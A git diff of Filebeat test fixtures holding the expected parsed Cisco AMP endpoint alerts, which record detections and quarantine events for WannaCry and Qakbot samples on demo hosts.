@@ -3138,10 +5698,9 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419275394960064597", - "cisco.amp.error.description": "Delete pending", - "cisco.amp.error.error_code": 3221225558, - "cisco.amp.event_type_id": 2164260880, + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064600", + "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -3149,9 +5708,10 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 423000000, - "event.action": "Quarantine Failure", + "cisco.amp.timestamp_nanoseconds": 751000000, + "event.action": "Threat Detected", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", @@ -3159,14 +5719,23 @@ "event.kind": "alert", "event.module": "cisco", "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 107014, + "log.offset": 121539, "related.hash": [ - "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -3175,6 +5744,9 @@ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", 
@@ -3193,10 +5765,9 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419275394960064596", - "cisco.amp.error.description": "Delete pending", - "cisco.amp.error.error_code": 3221225558, - "cisco.amp.event_type_id": 2164260880, + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064599", + "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -3204,9 +5775,10 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 377000000, - "event.action": "Quarantine Failure", + "cisco.amp.timestamp_nanoseconds": 735000000, + "event.action": "Threat Detected", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", @@ -3214,14 +5786,23 @@ "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 108200, + "log.offset": 122910, "related.hash": [ - "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "related.hosts": [ "Demo_WannaCry_Ransomware" 
@@ -3230,6 +5811,9 @@ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -3248,20 +5832,21 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419275394960064594", - "cisco.amp.error.description": "Delete pending", - "cisco.amp.error.error_code": 3221225558, - "cisco.amp.event_type_id": 2164260880, + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064597", + "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 33000000, - "event.action": "Quarantine Failure", + "cisco.amp.timestamp_nanoseconds": 423000000, + "event.action": "Threat Detected", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", @@ -3269,14 +5854,22 @@ "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\tasksche.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 109386, + "log.offset": 124281, + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "process.name": "mssecsvc.exe", + "process.pid": 6404, "related.hash": [ - "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "related.hosts": [ "Demo_WannaCry_Ransomware" 
@@ -3285,6 +5878,9 @@ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log-expected.json index 546e93300ef6..7f5499ebf3c6 100644 --- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log-expected.json +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log-expected.json 
@@ -180,6 +180,69 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T17:39:49.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419275390665097297", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 831000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275390665097000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 3893, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T17:39:49.000Z", "cisco.amp.computer.active": true, 
@@ -196,46 +259,694 @@ "cisco.amp.detection_id": "6419275390665097296", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 706000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275390665097000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 5147, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:49.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": 
"test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Gen.20gl.1201", + "cisco.amp.detection_id": "6419275390665097295", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 643000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275390665097000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 6745, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + 
"user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:49.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275390665097296", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 721000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275390665097000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 8343, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:59:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411525251028484105", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 
3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 698000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411525251028484000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 9463, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:59:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6411525251028484105", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 214000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411525251028484000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "6894b3834bd541fa85df79e44568acac", + "file.hash.sha1": 
"8cf0ca99a8f5019d8583133b9a9379299c45470c", + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "file.name": "MspthrdHash.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 10645, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "6894b3834bd541fa85df79e44568acac", + "8cf0ca99a8f5019d8583133b9a9379299c45470c" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:59:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6411525251028484104", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 183000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411525251028484000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "6894b3834bd541fa85df79e44568acac", + "file.hash.sha1": "8cf0ca99a8f5019d8583133b9a9379299c45470c", + "file.hash.sha256": 
"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "file.name": "MspthrdHash.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 12021, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "6894b3834bd541fa85df79e44568acac", + "8cf0ca99a8f5019d8583133b9a9379299c45470c" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:59:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411525251028484104", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 698000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411525251028484000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 13397, + "related.hash": [ + 
"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419264043361501262", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 888000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264043361501000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 14506, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + 
"cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229331435814969", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 779000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264043361501000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 15718, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204905956802579", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + 
"cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 716000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264043361501000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 16930, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419264043361501261", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 888000000, + "event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264043361501000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 
18142, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419264043361501262", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 706000000, - "event.action": "Threat Detected", + "cisco.amp.timestamp_nanoseconds": 872000000, + "event.action": "Retrospective Detection", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419275390665097000, + "event.id": 6419264043361501000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", - "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", - "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", - "file.name": "mssecsvc.exe", - "file.path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe", + "event.severity": 3, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.name": "u.wnry", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "host.os.family": "windows", "host.os.platform": "windows", - "host.user.name": 
